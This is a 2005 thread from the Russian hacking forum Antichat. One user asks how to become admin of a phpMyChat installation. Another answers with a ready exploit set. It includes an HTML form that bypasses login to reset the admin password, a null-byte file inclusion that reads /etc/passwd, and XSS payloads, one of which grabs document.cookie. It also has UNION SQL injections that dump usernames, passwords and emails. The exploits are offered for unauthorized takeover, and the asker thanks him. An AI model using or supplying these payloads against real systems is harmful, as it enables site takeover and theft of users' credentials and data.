Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   phpmychat (https://forum.antichat.xyz/showthread.php?t=10383)

koldun 29.10.2005 11:45
phpmychat
 
кто нибудь знает как можно стать админом в phpmychat 0.14.15?

vectorg 29.10.2005 11:59
попросить главного админа...

koldun 29.10.2005 19:43
вектор Г, а поумнее чё нить ешё придумать можешь

vectorg 29.10.2005 20:12
PHPMyChat 0.14.5

-------------------------------------

http://www.example.com/chat/config/start-page.css.php3?Charset=iso-8859-1&medium=10&FontName=<script>var%20test=1;alert(te st);</script>


http://www.example.com/chat/config/style.css.php3?Charset=iso-8859-1&medium=10&FontName=<script>var%20test=1;alert(te st);</script>

-------------------------------------

1) For non-authorized login it needs to send only one additional variable: do_not_login="false"

Example:
<HTML>

<HEAD>
<TITLE>phpMyChat exploit</TITLE>
</HEAD>

<BODY>
<FORM ACTION="http://[TARGET]/chat/edituser.php3" METHOD="GET" AUTOCOMPLETE="OFF" NAME="EditUsrForm">
<INPUT type="hidden" name="FORM_SEND" value="1">
<INPUT type="hidden" name="AUTH_USERNAME" value="admin">
<INPUT type="hidden" name="AUTH_PASSWORD" value="null">
<!-- INSERT -->
<INPUT type="hidden" name="do_not_login" value="false">
<!-- END INSERT -->
<INPUT TYPE="hidden" NAME="L" VALUE="russian">
<INPUT TYPE="text" NAME="U" VALUE="admin">NAME *<BR>
<INPUT TYPE="text" NAME="PASSWORD" VALUE="hex_pass">NEW PASS *<BR>
<INPUT TYPE="text" NAME="FIRSTNAME" VALUE="">FIRST NAME<BR>
<INPUT TYPE="text" NAME="LASTNAME" VALUE="">LAST NAME<BR>
<INPUT TYPE="radio" NAME="GENDER" VALUE="1" >male<BR>
<INPUT TYPE="radio" NAME="GENDER" VALUE="2" >female<BR>
<INPUT TYPE="text" NAME="COUNTRY" VALUE="">COUNTRY<BR>
<INPUT TYPE="text" NAME="WEBSITE" VALUE="">WEBSITE<BR>
<INPUT TYPE="text" NAME="EMAIL" VALUE="you@email.ru">
<INPUT type="checkbox" name="SHOWEMAIL" value="1" >show e-mail in public information<BR>
<INPUT TYPE="submit" NAME="submit_type" VALUE="Change">
</FORM>
</BODY>

</HTML>

2) To read files one needs to have the rights of administrator (read above for how to get them)!

Variables "sheet" ? "what" are not filtered:
require("./admin/admin${sheet}.php3");
and
if (isset($What) && $What != "") include("./admin/admin".$What.".php3");

Example:
http://[TARGET]/chat/admin.php3?From...=russian&user=[USER]&pswd=[YOU HASH
PASSWORD]&sheet=[FILE]%00
http://[TARGET]/chat/admin.php3?From...er=admin&pswd=[YOU HASH
PASSWORD]&sheet=/../../../../../../etc/passwd%00
and
http://[TARGET]/chat/admin.php3?From=admin.php3&What=[FILE]%00&L=russian&user=[USER]&pswd=[YOU HASH
PASSWORD]&sheet=1

http://[TARGET]/chat/admin.php3?From...er=admin&pswd=[YOU
HASH PASSWORD]&sheet=1

3) Cross-Site Scripting aka XSS
In input.php3 form there's variable "C", in which the color of messages is transferred.

Example:
<INPUT TYPE="TEXT" NAME="C" VALUE="#FF0000\">[CODE]">
<INPUT TYPE="TEXT" NAME="C" VALUE="#FF0000\"><script>alert(document.cookie)</script><a \"">

4) Great number of variables aren't filtered:
$sortBy, $sortOrder, $startReg, $U, $LastCheck and more ...
Example SQL-injection:
http://[TARGET]/chat/usersL.php3?L=russian&R='[SQL]

http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20usern ame,null,null,null%20FROM%20%20c_reg_users%20/*

http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20passw ord,null,null,null%20FROM%20%20c_reg_users%20/*

http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20email ,null,null,null%20FROM%20%20c_reg_users%20/*

koldun 29.10.2005 22:55
о спасибо большое выручил


Время: 15:33